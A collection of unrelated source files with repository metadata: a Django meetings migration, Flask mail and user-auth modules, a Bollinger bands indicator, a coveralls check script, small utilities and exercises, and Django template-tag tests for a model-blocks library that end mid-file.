itdagene/app/meetings/migrations/0001_initial.py
|
itdagene-ntnu/itdagene
|
b972cd3d803debccebbc33641397a39834b8d69a
|
[
"MIT"
] | 177
|
2018-10-27T18:15:56.000Z
|
2022-03-28T04:29:06.000Z
|
itdagene/app/meetings/migrations/0001_initial.py
|
itdagene-ntnu/itdagene
|
b972cd3d803debccebbc33641397a39834b8d69a
|
[
"MIT"
] | null | null | null |
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [migrations.swappable_dependency(settings.AUTH_USER_MODEL)]
operations = [
migrations.CreateModel(
name="Meeting",
fields=[
(
"id",
models.AutoField(
verbose_name="ID",
serialize=False,
auto_created=True,
primary_key=True,
),
),
("date_created", models.DateTimeField(editable=False)),
("date_saved", models.DateTimeField(editable=False)),
("date", models.DateField(verbose_name="date")),
("start_time", models.TimeField(verbose_name="from time")),
(
"end_time",
models.TimeField(null=True, verbose_name="to time", blank=True),
),
(
"type",
models.PositiveIntegerField(
default=0,
verbose_name="type",
choices=[
(0, "Board meeting"),
(1, "Web"),
(2, "Banquet"),
(3, "Logistics"),
(4, "Marketing"),
(5, "Other"),
],
),
),
(
"location",
models.CharField(
max_length=40, verbose_name="location", blank=True
),
),
(
"abstract",
models.TextField(null=True, verbose_name="abstract", blank=True),
),
(
"is_board_meeting",
models.BooleanField(default=True, verbose_name="is board meeting"),
),
(
"creator",
models.ForeignKey(
related_name="meeting_creator",
editable=False,
to=settings.AUTH_USER_MODEL,
on_delete=models.CASCADE,
),
),
(
"referee",
models.ForeignKey(
related_name="refereed_meetings",
verbose_name="referee",
blank=True,
on_delete=models.CASCADE,
to=settings.AUTH_USER_MODEL,
null=True,
),
),
(
"saved_by",
models.ForeignKey(
related_name="meeting_saved_by",
editable=False,
on_delete=models.CASCADE,
to=settings.AUTH_USER_MODEL,
),
),
],
options={"verbose_name": "meeting", "verbose_name_plural": "meetings"},
bases=(models.Model,),
),
migrations.CreateModel(
name="Penalty",
fields=[
(
"id",
models.AutoField(
verbose_name="ID",
serialize=False,
auto_created=True,
primary_key=True,
),
),
("date_created", models.DateTimeField(editable=False)),
("date_saved", models.DateTimeField(editable=False)),
(
"type",
models.CharField(
default="beer",
max_length=10,
verbose_name="type",
choices=[(b"beer", "Beer"), (b"wine", "Wine")],
),
),
(
"bottles",
models.PositiveIntegerField(
default=2, verbose_name="number of bottles"
),
),
("reason", models.TextField(verbose_name="reason")),
(
"creator",
models.ForeignKey(
related_name="penalty_creator",
editable=False,
to=settings.AUTH_USER_MODEL,
on_delete=models.CASCADE,
),
),
(
"meeting",
models.ForeignKey(
verbose_name="meeting",
blank=True,
to="meetings.Meeting",
null=True,
on_delete=models.SET_NULL,
),
),
(
"saved_by",
models.ForeignKey(
related_name="penalty_saved_by",
editable=False,
to=settings.AUTH_USER_MODEL,
on_delete=models.CASCADE,
),
),
(
"user",
models.ForeignKey(
related_name="penalties",
verbose_name="person",
to=settings.AUTH_USER_MODEL,
on_delete=models.CASCADE,
),
),
],
options={"abstract": False},
bases=(models.Model,),
),
migrations.CreateModel(
name="ReplyMeeting",
fields=[
(
"id",
models.AutoField(
verbose_name="ID",
serialize=False,
auto_created=True,
primary_key=True,
),
),
("date_created", models.DateTimeField(editable=False)),
("date_saved", models.DateTimeField(editable=False)),
(
"is_attending",
models.NullBooleanField(default=False, verbose_name="attending"),
),
(
"creator",
models.ForeignKey(
related_name="replymeeting_creator",
editable=False,
to=settings.AUTH_USER_MODEL,
on_delete=models.CASCADE,
),
),
(
"meeting",
models.ForeignKey(
related_name="replies",
verbose_name="meeting",
to="meetings.Meeting",
on_delete=models.CASCADE,
),
),
(
"saved_by",
models.ForeignKey(
related_name="replymeeting_saved_by",
editable=False,
to=settings.AUTH_USER_MODEL,
on_delete=models.CASCADE,
),
),
(
"user",
models.ForeignKey(
verbose_name="user",
to=settings.AUTH_USER_MODEL,
on_delete=models.CASCADE,
),
),
],
options={"abstract": False},
bases=(models.Model,),
),
]
| 35.695067
| 87
| 0.358417
| 7,842
| 0.985176
| 0
| 0
| 0
| 0
| 0
| 0
| 848
| 0.106533
|
3bcdfa047a911d02d5d42da304bd32569f2f1c95
| 2,247
|
py
|
Python
|
models/mail.py
|
Huy-Ngo/temp-mail
|
6269f1f405cd7447ea0d45799ee1c4a0623d23a6
|
[
"MIT"
] | 3
|
2022-01-18T17:15:17.000Z
|
2022-01-22T09:52:19.000Z
|
models/mail.py
|
Huy-Ngo/temp-mail
|
6269f1f405cd7447ea0d45799ee1c4a0623d23a6
|
[
"MIT"
] | 28
|
2020-06-18T08:53:32.000Z
|
2020-08-07T02:33:47.000Z
|
models/mail.py
|
Huy-Ngo/temp-mail
|
6269f1f405cd7447ea0d45799ee1c4a0623d23a6
|
[
"MIT"
] | null | null | null |
# Copyright (c) 2020 Ngô Ngọc Đức Huy
from db import db
class MailModel(db.Model):
"""Model for representing and storing mails."""
id = db.Column(db.Integer, primary_key=True)
sender = db.Column(db.String(254))
recipient = db.Column(db.String(254),
db.ForeignKey('user_model.email_address'),
nullable=False)
# headers
mail_from = db.Column(db.String(300))
rcpt_to = db.Column(db.String(300))
date = db.Column(db.DateTime)
subject = db.Column(db.String(150))
# payload
text = db.Column(db.String)
html = db.Column(db.String)
# status check
is_read = db.Column(db.Boolean, default=False)
def __init__(self, sender, recipient, mail_from,
rcpt_to, date, subject, text, html):
self.sender = sender
self.recipient = recipient
self.mail_from = mail_from
self.rcpt_to = rcpt_to
self.date = date
self.subject = subject
self.text = text
self.html = html
self.is_read = False
def json(self) -> dict:
"""Return the information of the object as a JSON"""
return {
'id': self.id,
'sender': self.sender,
'recipient': self.recipient,
'headers': {
'from': self.mail_from,
'to': self.rcpt_to,
'date': self.date.__str__(),
'subject': self.subject
},
'payload': {
'text': self.text,
'html': self.html
},
'is_read': self.is_read
}
@classmethod
def fetch_by_address(cls, address: str):
"""Get all the mails sent to the address."""
return cls.query.filter_by(recipient=address).all()
@classmethod
def fetch_by_id(cls, _id: int):
"""Get the email that has a specific ID."""
return cls.query.filter_by(id=_id).first()
def save_to_db(self):
"""Save the email to database."""
db.session.add(self)
db.session.commit()
def set_read(self):
"""Set the email as read."""
self.is_read = True
db.session.add(self)
db.session.commit()
| 28.807692
| 68
| 0.549622
| 2,185
| 0.969818
| 0
| 0
| 321
| 0.142477
| 0
| 0
| 437
| 0.193964
|
3bce9c159c555e02a3e9d2befee3b2b0dfb1fa84
| 1,681
|
py
|
Python
|
jesse/indicators/bollinger_bands.py
|
leaiannotti/jesse
|
564c54845774891ff3b5a8d3c02cc7cea890ac54
|
[
"MIT"
] | 5
|
2021-05-21T07:39:16.000Z
|
2021-11-17T11:08:41.000Z
|
jesse/indicators/bollinger_bands.py
|
leaiannotti/jesse
|
564c54845774891ff3b5a8d3c02cc7cea890ac54
|
[
"MIT"
] | null | null | null |
jesse/indicators/bollinger_bands.py
|
leaiannotti/jesse
|
564c54845774891ff3b5a8d3c02cc7cea890ac54
|
[
"MIT"
] | 2
|
2021-05-21T10:14:53.000Z
|
2021-05-27T04:39:51.000Z
|
from collections import namedtuple
import numpy as np
import talib
from jesse.indicators.ma import ma
from jesse.indicators.mean_ad import mean_ad
from jesse.indicators.median_ad import median_ad
from jesse.helpers import get_candle_source, slice_candles
BollingerBands = namedtuple('BollingerBands', ['upperband', 'middleband', 'lowerband'])
def bollinger_bands(candles: np.ndarray, period: int = 20, devup: float = 2, devdn: float = 2, matype: int = 0, devtype: int = 0,
source_type: str = "close",
sequential: bool = False) -> BollingerBands:
"""
BBANDS - Bollinger Bands
:param candles: np.ndarray
:param period: int - default: 20
:param devup: float - default: 2
:param devdn: float - default: 2
:param matype: int - default: 0
:param devtype: int - default: 0
:param source_type: str - default: "close"
:param sequential: bool - default=False
:return: BollingerBands(upperband, middleband, lowerband)
"""
candles = slice_candles(candles, sequential)
source = get_candle_source(candles, source_type=source_type)
if devtype == 0:
dev = talib.STDDEV(source, period)
elif devtype == 1:
dev = mean_ad(source, period, sequential=True)
elif devtype == 2:
dev = median_ad(source, period, sequential=True)
middlebands = ma(source, period=period, matype=matype, sequential=True)
upperbands = middlebands + devup * dev
lowerbands = middlebands - devdn * dev
if sequential:
return BollingerBands(upperbands, middlebands, lowerbands)
else:
return BollingerBands(upperbands[-1], middlebands[-1], lowerbands[-1])
| 32.960784
| 129
| 0.684117
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 467
| 0.277811
|
3bcf9e27b60f3e382de5df8d52f14b8d023fe9df
| 3,050
|
py
|
Python
|
coveralls_check.py
|
jayvdb/coveralls-check
|
ca3b0428b90fe3c6d22cad3a122dedc2c46d12e4
|
[
"MIT"
] | null | null | null |
coveralls_check.py
|
jayvdb/coveralls-check
|
ca3b0428b90fe3c6d22cad3a122dedc2c46d12e4
|
[
"MIT"
] | 2
|
2018-07-11T07:09:25.000Z
|
2022-03-10T12:18:18.000Z
|
coveralls_check.py
|
jayvdb/coveralls-check
|
ca3b0428b90fe3c6d22cad3a122dedc2c46d12e4
|
[
"MIT"
] | 1
|
2020-01-10T05:27:46.000Z
|
2020-01-10T05:27:46.000Z
|
from __future__ import print_function
import logging
from argparse import ArgumentParser
import backoff
import requests
import sys
POLL_URL = 'https://coveralls.io/builds/{}.json'
DONE_URL = 'https://coveralls.io/webhook'
def setup_logging():
logger = logging.getLogger('backoff')
logger.addHandler(logging.StreamHandler())
logger.setLevel(logging.INFO)
def message(args, covered, template):
print(template.format(
args.commit, covered, args.fail_under
))
def get_coverage(commit):
response = requests.get(POLL_URL.format(commit))
data = response.json()
return data['covered_percent']
def decorate(func, args):
interval = 10
return backoff.on_predicate(
backoff.constant,
interval=interval, max_tries=args.max_wait*60/interval,
jitter=lambda value: value,
)(func)
def ensure_parallel_done(args):
if args.parallel_build_number:
response = requests.post(
DONE_URL,
params={'repo_token': args.repo_token},
json={
"payload": {
"build_num": args.parallel_build_number,
"status": "done"
}
}
)
if response.status_code == 200:
print('Confirmed end of parallel build')
else:
print(
'Attempt to confirmed end of parallel build got {}:\n{}'.format(
response.status_code, response.content
)
)
sys.exit(1)
def parse_args():
parser = ArgumentParser()
parser.add_argument('commit', help='the commit hash to check')
parser.add_argument('--fail-under', type=float, default=100,
help='Exit with a status of 2 if the total coverage is '
'less than MIN.')
parser.add_argument('--max-wait', type=int, default=5,
help='Maximum time, in minutes, to wait for Coveralls '
'data. Defaults to 5.')
parser.add_argument('--parallel-build-number', type=int,
help='The build number, eg $TRAVIS_BUILD_NUMBER.')
parser.add_argument('--repo-token',
help='Required if --parallel-build-number is used and '
'should be the token use when POSTing back to '
'coveralls to mark the parallel build as done. '
'Should come from a secret.')
return parser.parse_args()
def main():
args = parse_args()
setup_logging()
ensure_parallel_done(args)
get_coverage_ = decorate(get_coverage, args)
covered = get_coverage_(args.commit)
if covered is None:
print('No coverage information available for {}'.format(args.commit))
sys.exit(1)
elif covered < args.fail_under:
message(args, covered, 'Failed coverage check for {} as {} < {}')
sys.exit(2)
else:
message(args, covered, 'Coverage OK for {} as {} >= {}')
| 30.5
| 80
| 0.585902
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 798
| 0.261639
|
3bd21db03fbff68669d9cf01fd41194e607124e2
| 1,399
|
py
|
Python
|
ScienceCruiseDataManagement/data_storage_management/utils.py
|
Swiss-Polar-Institute/science-cruise-data-management
|
67721a0f4a1255b8ac43e530ed95a8c324239c7c
|
[
"MIT"
] | 6
|
2017-10-06T09:18:04.000Z
|
2022-02-10T08:54:56.000Z
|
ScienceCruiseDataManagement/data_storage_management/utils.py
|
Swiss-Polar-Institute/science-cruise-data-management
|
67721a0f4a1255b8ac43e530ed95a8c324239c7c
|
[
"MIT"
] | 12
|
2020-02-27T09:24:50.000Z
|
2021-09-22T17:39:55.000Z
|
ScienceCruiseDataManagement/data_storage_management/utils.py
|
Swiss-Polar-Institute/science-cruise-data-management
|
67721a0f4a1255b8ac43e530ed95a8c324239c7c
|
[
"MIT"
] | 1
|
2017-10-16T13:49:33.000Z
|
2017-10-16T13:49:33.000Z
|
import subprocess
import glob
import os
import datetime
# This file is part of https://github.com/cpina/science-cruise-data-management
#
# This project was programmed in a hurry without any prior Django experience,
# while circumnavigating the Antarctic on the ACE expedition, without proper
# Internet access, with 150 scientists using the system and doing at the same
# cruise other data management and system administration tasks.
#
# Sadly there aren't unit tests and we didn't have time to refactor the code
# during the cruise, which is really needed.
#
# Carles Pina (carles@pina.cat) and Jen Thomas (jenny_t152@yahoo.co.uk), 2016-2017.
def log(message):
f = open(os.path.join(os.environ["HOME"], "logs", "importer.log"), "a")
now = datetime.datetime.now()
now = now.strftime("%Y-%m-%d %H:%M:%S")
f.write("{} {}\n".format(now, message))
f.close()
def rsync_copy(origin, destination):
origin = glob.glob(origin)
return execute(["rsync",
"-rvt"] + origin + [destination], print_command=True)
def execute(cmd, abort_if_fails=False, print_command=False):
if print_command:
print("** Execute: {}".format(" ".join(cmd)))
p = subprocess.Popen(cmd)
p.communicate()[0]
retval = p.returncode
if retval != 0 and abort_if_fails:
print("Command: _{}_ failed, aborting...".format(cmd))
exit(1)
return retval
| 31.088889
| 83
| 0.68549
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 701
| 0.501072
|
3bd3be55e7aed0ec74f1031095e8ca063b4aa8fd
| 515
|
py
|
Python
|
Applied Project/Web/app/config.py
|
rebeccabernie/CurrencyAnalyser
|
1f57e5b5fee854912c205cb98f57c980027f0a03
|
[
"MIT"
] | 27
|
2018-06-22T18:49:52.000Z
|
2022-02-18T07:58:48.000Z
|
Applied Project/Web/app/config.py
|
taraokelly/CurrencyAnalyser
|
1f57e5b5fee854912c205cb98f57c980027f0a03
|
[
"MIT"
] | 10
|
2020-01-28T22:24:22.000Z
|
2022-02-10T13:11:32.000Z
|
Applied Project/Web/app/config.py
|
taraokelly/CurrencyAnalyser
|
1f57e5b5fee854912c205cb98f57c980027f0a03
|
[
"MIT"
] | 6
|
2018-05-02T16:43:45.000Z
|
2020-11-17T18:00:36.000Z
|
""" Global Flask Application Settings """
import os
from app import app
class Config(object):
DEBUG = False
TESTING = False
PRODUCTION = False
class Development(Config):
MODE = 'Development'
DEBUG = True
class Production(Config):
MODE = 'Production'
DEBUG = False
PRODUCTION = True
# Set FLASK_CONFIG env to 'Production' or 'Development' to set Config
flask_config = os.environ.get('FLASK_CONFIG', 'Development')
app.config.from_object('app.config.{}'.format(flask_config))
| 19.074074
| 69
| 0.700971
| 239
| 0.464078
| 0
| 0
| 0
| 0
| 0
| 0
| 177
| 0.343689
|
3bd3e56f8e3f7640af1c0c1de7776e8679289263
| 103
|
py
|
Python
|
Exercise-1/Q4_reverse.py
|
abhay-lal/18CSC207J-APP
|
79a955a99837e6d41c89cb1a9e84eb0230c0fa7b
|
[
"MIT"
] | null | null | null |
Exercise-1/Q4_reverse.py
|
abhay-lal/18CSC207J-APP
|
79a955a99837e6d41c89cb1a9e84eb0230c0fa7b
|
[
"MIT"
] | null | null | null |
Exercise-1/Q4_reverse.py
|
abhay-lal/18CSC207J-APP
|
79a955a99837e6d41c89cb1a9e84eb0230c0fa7b
|
[
"MIT"
] | null | null | null |
word = input('Enter a word')
len = len(word)
for i in range(len-1, -1, -1):
print(word[i], end='')
| 20.6
| 30
| 0.572816
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 16
| 0.15534
|
3bd475c386fa8a4a56cad45921819b936313ea64
| 162
|
py
|
Python
|
exercise/6.py
|
zhaoshengshi/practicepython-exercise
|
3e123eb602aaf1c9638c7a2199607146e860b96c
|
[
"Apache-2.0"
] | null | null | null |
exercise/6.py
|
zhaoshengshi/practicepython-exercise
|
3e123eb602aaf1c9638c7a2199607146e860b96c
|
[
"Apache-2.0"
] | null | null | null |
exercise/6.py
|
zhaoshengshi/practicepython-exercise
|
3e123eb602aaf1c9638c7a2199607146e860b96c
|
[
"Apache-2.0"
] | null | null | null |
ss = input('Please give me a string: ')
if ss == ss[::-1]:
print("Yes, %s is a palindrome." % ss)
else:
print('Nevermind, %s isn\'t a palindrome.' % ss)
| 23.142857
| 52
| 0.574074
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 89
| 0.549383
|
3bd4ef311d3ceb65a757cf2dcd1641a9fa9f94c6
| 5,420
|
py
|
Python
|
app/v2/resources/users.py
|
fabischolasi/fast-food-fast-v1
|
492f0bdaaeadf12089a200a9b64bdfc22cd03d0c
|
[
"MIT"
] | 1
|
2019-10-16T07:56:31.000Z
|
2019-10-16T07:56:31.000Z
|
app/v2/resources/users.py
|
fabzer0/FastFoodAPI
|
492f0bdaaeadf12089a200a9b64bdfc22cd03d0c
|
[
"MIT"
] | null | null | null |
app/v2/resources/users.py
|
fabzer0/FastFoodAPI
|
492f0bdaaeadf12089a200a9b64bdfc22cd03d0c
|
[
"MIT"
] | null | null | null |
from flask import Blueprint, jsonify, make_response
from flask_restful import Resource, Api, reqparse, inputs
from ..models.decorators import admin_required
from ..models.models import UserModel
import os
class SignUp(Resource):
def __init__(self):
"""
Validates both json and form-data input
"""
self.reqparse = reqparse.RequestParser()
self.reqparse.add_argument(
'username',
required=True,
help='kindly provide a valid username',
type=inputs.regex(r"(.*\S.*)"),
location=['form', 'json'])
self.reqparse.add_argument(
'email',
required=True,
help='kindly provide a valid email address',
location=['form', 'json'],
type=inputs.regex(r"(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)"))
self.reqparse.add_argument(
'password',
required=True,
trim=True,
help='kindly provide a valid password',
location=['form', 'json'])
self.reqparse.add_argument(
'confirm_password',
required=True,
trim=True,
help='kindly provide a valid confirmation password',
location=['form', 'json'])
super(SignUp, self).__init__()
def post(self):
"""
Register a new user
"""
kwargs = self.reqparse.parse_args()
username = kwargs.get('username')
email = kwargs.get('email')
password = kwargs.get('password')
confirm_password = kwargs.get('confirm_password')
username_exist = UserModel.get_one('users', username=username)
if username_exist:
return make_response(jsonify({'message': 'username already taken'}), 400)
if password == confirm_password:
if len(password) >= 8:
email_exists = UserModel.get_one('users', email=email)
if not email_exists:
if username == os.getenv('ADMIN'):
user = UserModel(username=username, email=email, password=password)
user.create_user()
fetch_admin = UserModel.get_one('users', username=username)
data = {'admin': True}
UserModel.update('users', id=fetch_admin[0], data=data)
user = UserModel.get_one('users', id=fetch_admin[0])
return jsonify({'admin': UserModel.user_details(user)})
user = UserModel(username=username, email=email, password=password)
user.create_user()
user = UserModel.get_one('users', username=username)
return make_response(jsonify({'message': 'successfully registered', 'user': UserModel.user_details(user)}), 201)
return make_response(jsonify({'message': 'email already taken'}), 203)
return make_response(jsonify({'message': 'password should be atleast 8 characters'}), 400)
return make_response(jsonify({"message" : "password and confirm password should be identical"}), 400)
class AllUsers(Resource):
@admin_required
def get(self):
users = UserModel.get_all('users')
if not users:
return jsonify({'message': 'no users found yet'})
return make_response(jsonify({'all_users': [UserModel.user_details(user) for user in users]}))
class PromoteUser(Resource):
@admin_required
def put(self, user_id):
user = UserModel.get_one('users', id=user_id)
if not user:
return jsonify({'message': 'user not found'})
data = {'admin': True}
UserModel.update('users', id=user[0], data=data)
user = UserModel.get_one('users', id=user_id)
return jsonify({'user': UserModel.user_details(user)})
class Login(Resource):
def __init__(self):
self.reqparse = reqparse.RequestParser()
self.reqparse.add_argument(
'email',
required=True,
help='kindly provide a valid email address',
location=['form', 'json'],
type=inputs.regex(r"(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)"))
self.reqparse.add_argument(
'password',
required=True,
trim=True,
help='kindly provide a valid password',
location=['form', 'json'])
super(Login, self).__init__()
def post(self):
kwargs = self.reqparse.parse_args()
email = kwargs.get('email')
password = kwargs.get('password')
user = UserModel.get_one('users', email=email)
if user is None:
return make_response(jsonify({'message': 'invalid email or password'}), 404)
if UserModel.validate_password(password=password, email=user[2]):
token = UserModel.generate_token(user)
return make_response(jsonify({'message': 'you are successfully logged in', 'token': token}), 200)
return make_response(jsonify({'message': 'invalid email or password'}), 401)
users_api = Blueprint('resources.users', __name__)
api = Api(users_api)
api.add_resource(SignUp, '/auth/signup', endpoint='signup')
api.add_resource(AllUsers, '/users')
api.add_resource(PromoteUser, '/users/<int:user_id>')
api.add_resource(Login, '/auth/login', endpoint='login')
| 38.992806
| 132
| 0.587823
| 4,921
| 0.907934
| 0
| 0
| 646
| 0.119188
| 0
| 0
| 1,238
| 0.228413
|
3bd6298a19903f15f7e907c194b8869777800558
| 21,160
|
py
|
Python
|
model_blocks/tests.py
|
aptivate/django-model-blocks
|
5057ed57887683d777f04c95d67d268d21a18c02
|
[
"BSD-3-Clause"
] | 6
|
2015-01-20T08:43:44.000Z
|
2020-08-13T01:57:10.000Z
|
model_blocks/tests.py
|
techdragon/django-model-blocks
|
8175d7353d792cb720b4ac356f4538888bf7747c
|
[
"BSD-3-Clause"
] | 1
|
2016-10-16T17:35:07.000Z
|
2016-10-16T17:35:07.000Z
|
model_blocks/tests.py
|
techdragon/django-model-blocks
|
8175d7353d792cb720b4ac356f4538888bf7747c
|
[
"BSD-3-Clause"
] | null | null | null |
"""
Test the model blocks
"""
import datetime
from django.test import TestCase
from mock import Mock
from django.db.models import Model, IntegerField, DateTimeField, CharField
from django.template import Context, Template, TemplateSyntaxError
from example_project.pepulator_factory.models import Pepulator, Distributor
from model_blocks.templatetags import model_filters
from model_blocks.templatetags import model_nodes
class DetailBlockFilterTest (TestCase):
fixtures = ['pepulator_factory_data.json']
def setUp(self):
# Mock Django's get_template so that it doesn't load a real file;
# instead just return a template that allows us to verify the context
model_nodes.get_template = Mock(
return_value=Template(('{{ title|default_if_none:instance|safe }}:{{ model|safe }},'
'{% for name, label, value, is_list, is_link in fields %}'
'{{ name|safe }},'
'{{ label|safe }},'
'{% if not is_list %}'
'{% if is_link %}'
'@{{ value }}'
'{% else %}'
'{{ value|safe }}'
'{% endif %}'
'{% else %}'
'[{% for item in value.all %}{{ item|safe }},{% endfor %}]'
'{% endif %},'
'{% endfor %}')))
def test_model_format(self):
"""Tests that a given model is formatted as expected."""
pepulator = Pepulator.objects.get(serial_number=1235)
expected_detail = (u"Pepulator #1235:pepulator,"
"serial_number,serial number,1235,"
"height,height,12,"
"width,width,15,"
"manufacture_date,manufacture date,2011-06-10 11:12:33,"
"color,color,red,"
"address,address,@ppr://1235/,"
"distributed_by,distributed by,Walmart,"
"knuckles,knuckles,[Knuckle of hardness 2.35,Knuckle of hardness 1.10,],"
"jambs,jambs,[],"
)
detail = model_filters.as_detail_block(pepulator)
model_nodes.get_template.assert_called_with('model_blocks/object_detail.html')
self.assertEqual(detail, expected_detail)
def test_filter_is_registered(self):
"""Test that the filter can be used from within a template"""
template = Template(('{% load model_filters %}'
'{{ pepulator|as_detail_block }}'))
pepulator = Pepulator.objects.get(serial_number=1235)
context = Context({'pepulator':pepulator})
expected_detail = (u"Pepulator #1235:pepulator,"
"serial_number,serial number,1235,"
"height,height,12,"
"width,width,15,"
"manufacture_date,manufacture date,2011-06-10 11:12:33,"
"color,color,red,"
"address,address,@ppr://1235/,"
"distributed_by,distributed by,Walmart,"
"knuckles,knuckles,[Knuckle of hardness 2.35,Knuckle of hardness 1.10,],"
"jambs,jambs,[],"
)
detail = template.render(context)
model_nodes.get_template.assert_called_with('model_blocks/object_detail.html')
self.assertEqual(detail, expected_detail)
def test_title_is_used(self):
"""Test that a title is used if provided"""
template = Template(('{% load model_filters %}'
'{{ pepulator|as_detail_block:"My Pepulator" }}'))
pepulator = Pepulator.objects.get(serial_number=1235)
context = Context({'pepulator':pepulator})
expected_detail = (u"My Pepulator:pepulator,"
"serial_number,serial number,1235,"
"height,height,12,"
"width,width,15,"
"manufacture_date,manufacture date,2011-06-10 11:12:33,"
"color,color,red,"
"address,address,@ppr://1235/,"
"distributed_by,distributed by,Walmart,"
"knuckles,knuckles,[Knuckle of hardness 2.35,Knuckle of hardness 1.10,],"
"jambs,jambs,[],"
)
detail = template.render(context)
model_nodes.get_template.assert_called_with('model_blocks/object_detail.html')
self.assertEqual(detail, expected_detail)
def test_related_fields(self):
"""Tests that related fields not defined on the model are included."""
pepulator = Distributor.objects.get(name="Mom & Pop")
expected_detail = (u"Mom & Pop:distributor,"
"name,name,Mom & Pop,"
"capacity,capacity,175,"
"stock,stock,[Pepulator #1238,],"
)
detail = model_filters.as_detail_block(pepulator)
model_nodes.get_template.assert_called_with('model_blocks/object_detail.html')
self.assertEqual(detail, expected_detail)
class TeaserBlockFilterTest (TestCase):
fixtures = ['pepulator_factory_data.json']
def setUp(self):
# Mock Django's get_template so that it doesn't load a real file;
# instead just return a template that allows us to verify the context
model_nodes.get_template = Mock(
return_value=Template('{{ title|default_if_none:instance|safe }}:{{ model|safe }},{% for name, label, value, is_list in fields %}{{ name|safe }},{{ label|safe }},{% if not is_list %}{{ value|safe }}{% else %}[{% for item in value.all %}{{ item|safe }},{% endfor %}]{% endif %},{% endfor %}'))
def test_model_format(self):
"""Tests that a given model is formatted as expected."""
pepulator = Pepulator.objects.get(serial_number=1235)
expected_teaser = (u"Pepulator #1235:pepulator,"
"serial_number,serial number,1235,"
"height,height,12,"
"width,width,15,"
"manufacture_date,manufacture date,2011-06-10 11:12:33,"
"color,color,red,"
"address,address,ppr://1235/,"
"distributed_by,distributed by,Walmart,"
"knuckles,knuckles,[Knuckle of hardness 2.35,Knuckle of hardness 1.10,],"
"jambs,jambs,[],"
)
teaser = model_filters.as_teaser_block(pepulator)
model_nodes.get_template.assert_called_with('model_blocks/object_teaser.html')
self.assertEqual(teaser, expected_teaser)
class ListBlockFilterTest (TestCase):
fixtures = ['pepulator_factory_data.json']
def setUp(self):
# Mock Django's get_template so that it doesn't load a real file;
# instead just return a template that allows us to verify the context
model_nodes.get_template = Mock(
return_value=Template('{{ title|default_if_none:model|capfirst }}{% if not title %}s{% endif %}:{{ instance_list|safe }}'))
def test_list_format(self):
"""Tests that a given model is formatted as expected."""
pepulator_list = Pepulator.objects.filter(serial_number__gt=2000)
expected_rendering = (u"Pepulators:[<Pepulator: Pepulator #2345>, "
"<Pepulator: Pepulator #2346>]")
rendering = model_filters.as_list_block(pepulator_list)
model_nodes.get_template.assert_called_with('model_blocks/object_list.html')
self.assertEqual(rendering, expected_rendering)
def test_filter_is_registered(self):
"""Test that the filter can be used from within a template"""
template = Template(('{% load model_filters %}'
'{{ pepulators|as_list_block }}'))
pepulator_list = Pepulator.objects.filter(serial_number__gt=2000)
context = Context({'pepulators':pepulator_list})
expected_rendering = (u"Pepulators:[<Pepulator: Pepulator #2345>, "
"<Pepulator: Pepulator #2346>]")
rendering = template.render(context)
model_nodes.get_template.assert_called_with('model_blocks/object_list.html')
self.assertEqual(rendering, expected_rendering)
def test_empty_queryset(self):
"""Test that the filter can be used from within a template"""
template = Template(('{% load model_filters %}'
'{{ pepulators|as_list_block }}'))
pepulator_list = Pepulator.objects.filter(serial_number__gt=5000)
context = Context({'pepulators':pepulator_list})
expected_rendering = (u"Pepulators:[]")
rendering = template.render(context)
model_nodes.get_template.assert_called_with('model_blocks/object_list.html')
self.assertEqual(rendering, expected_rendering)
def test_non_query_set_results_in_no_model(self):
"""Test that when a non queryset is used, the model is None"""
# Why? Because we try to read the model off of the queryset. If we just
# have a list of objects, then we don't know the model.
template = Template(('{% load model_filters %}'
'{{ pepulators|as_list_block }}'))
pepulator_list = [p for p in Pepulator.objects.filter(serial_number__gt=2000)]
context = Context({'pepulators':pepulator_list})
expected_rendering = (u"Nones:[<Pepulator: Pepulator #2345>, "
"<Pepulator: Pepulator #2346>]")
rendering = template.render(context)
model_nodes.get_template.assert_called_with('model_blocks/object_list.html')
self.assertEqual(rendering, expected_rendering)
def test_empty_list(self):
"""Test that when a non queryset is used, the model is None"""
template = Template(('{% load model_filters %}'
'{{ pepulators|as_list_block }}'))
pepulator_list = []
context = Context({'pepulators':pepulator_list})
expected_rendering = (u"Nones:[]")
rendering = template.render(context)
model_nodes.get_template.assert_called_with('model_blocks/object_list.html')
self.assertEqual(rendering, expected_rendering)
def test_alternate_title_is_used(self):
"""Test that a list title is used if provided"""
template = Template(('{% load model_filters %}'
'{{ pepulators|as_list_block:"Some Pepulators" }}'))
pepulator_list = Pepulator.objects.filter(serial_number__gt=2000)
context = Context({'pepulators':pepulator_list})
expected_rendering = (u"Some Pepulators:[<Pepulator: Pepulator #2345>, "
"<Pepulator: Pepulator #2346>]")
rendering = template.render(context)
model_nodes.get_template.assert_called_with('model_blocks/object_list.html')
self.assertEqual(rendering, expected_rendering)
class DetailBlockTagTest (TestCase):
fixtures = ['pepulator_factory_data.json']
def setUp(self):
# Mock Django's get_template so that it doesn't load a real file;
# instead just return a template that allows us to verify the context
model_nodes.get_template = Mock(
return_value=Template('{{ title|default_if_none:instance|safe }}:{{ model|safe }},{% for name, label, value, is_list in fields %}{{ name|safe }},{{ label|safe }},{% if not is_list %}{{ value|safe }}{% else %}[{% for item in value.all %}{{ item|safe }},{% endfor %}]{% endif %},{% endfor %}'))
def test_tag_is_registered(self):
"""Test that the filter can be used from within a template"""
template = Template(('{% load model_tags %}'
'{% with pepulator_factory_pepulator_detail_template="pepulator_factory/pepulator_detail.html" %}'
'{% detail_block pepulator %}'
'{% endwith %}'))
pepulator = Pepulator.objects.get(serial_number=1235)
context = Context({'pepulator':pepulator})
expected_detail = (u"Pepulator #1235:pepulator,"
"serial_number,serial number,1235,"
"height,height,12,"
"width,width,15,"
"manufacture_date,manufacture date,2011-06-10 11:12:33,"
"color,color,red,"
"address,address,ppr://1235/,"
"distributed_by,distributed by,Walmart,"
"knuckles,knuckles,[Knuckle of hardness 2.35,Knuckle of hardness 1.10,],"
